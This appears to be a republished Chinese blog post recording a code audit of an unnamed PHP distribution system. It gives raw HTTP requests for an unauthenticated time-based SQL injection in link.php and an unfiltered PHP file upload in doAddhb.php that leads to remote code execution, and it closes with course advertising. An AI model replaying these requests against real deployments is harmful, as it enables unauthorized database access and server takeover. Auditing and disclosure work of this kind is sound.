2025-12-30 01:31:41 网络安全文章来源：ZONE.CI 全球网 0 阅读模式

文章总结： 本文记录了某分销系统代码审计过程，发现link.php存在未鉴权SQL注入，且doAddhb.php存在无过滤文件上传漏洞。通过上传PHP并访问重命名路径，成功实现前台RCE。文末附带安全课程推广信息。 综合评分： 75 文章分类： 代码审计,漏洞分析,WEB安全,漏洞POC

cover_image

【代码审计】某分销系统代码审计流程

进击安全

2025年12月28日 20:40 北京

以下文章来源于403bypass ，作者Bypass

403bypass .

学习安全中，不定时更新~

00 前言

最近在Get代码审计技能点，这里记录一下自己的第一个代码审计出货案例，该源码比较简单，大佬可直接绕过。

页面如下

01 前台SQL注入

通过这个文件可以发现，可以发现这个漏洞其实就和靶场一下，没什么难度，直接进行注入即可，这里使用GET传入id参数之后直接拼接到SQL语句当中，并且在文件当中未见鉴权信息。

数据包：

GET&nbsp;/link.php?id=1+and+sleep(3) HTTP/1.1Host:&nbsp;Cache-Control: max-age=0Upgrade-Insecure-Requests:&nbsp;1User-Agent: Mozilla/5.0&nbsp;(Windows NT&nbsp;10.0; Win64; x64) AppleWebKit/537.36&nbsp;(KHTML, like Gecko) Chrome/143.0.0.0&nbsp;Safari/537.36&nbsp;Edg/143.0.0.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflate, brAccept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6Connection: keep-alive

这里可以看到成功延迟了6s，这里就表明这个SQL语句在这个代码当中执行了两次，导致延迟了6s，不过我们可以根据这个漏洞继续深入利用进入后台等操作，但是这里存在前台RCE，这个漏洞就到此为止了。

02 前台文件上传

这里我们可以看到存在Controller层，但是这个文件的写法也不像是走Controller层，这里直接上传即可，并且只是对我们的文件名称进行了一个时间戳转换，并没有相关的过滤。

这里也没看到存在鉴权，就是文件名称进行重命名了一下，这里直接进行上传（move_uploaded_file是php常用的上传方法），并且对文件名称进行了重命名，同时保存在了当前的/make/uploads/文件夹下。

数据包如下：

POST /make/controller/doAddhb.php HTTP/1.1Host:&nbsp;Cache-Control: max-age=0Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36 Edg/143.0.0.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflate, brAccept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6Connection: keep-aliveContent-Length: 160Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryAT5VNPiNFe9r5HSR------WebKitFormBoundaryAT5VNPiNFe9r5HSRContent-Disposition: form-data; name="poster_url"; filename="1.php"1------WebKitFormBoundaryAT5VNPiNFe9r5HSR--

可以看到添加成功，同时这里没有回显，我们知道目标根据当前的时间戳对文件名称进行了重命名，但是这里可以尝试进行爆破，或者直接根据对方服务器返回的时间来访问文件名称。

这里借助AI来生成。

尝试进行访问。

成功RCE，记录一下自己的第一个白盒漏洞。

广告区域

目前第四期进阶课程已经开始，课表如下：

同时报名第四期基础课程同样可看，课表如下：

同时具备内部资料以及靶场相关福利，想要了解的师傅可以冲了。

免责声明：

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景，旨在提升网络安全防护能力，具有明确的技术研究属性。

任何单位或个人未经授权，将本文内容用于攻击、破坏等非法用途的，由此引发的全部法律责任、民事赔偿及连带责任，均由行为人独立承担，本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布，若存在版权侵权或其他异议，请通过邮件联系处理，具体联系方式可点击页面上方的联系我。

本文转载自：进击安全《【代码审计】某分销系统代码审计流程》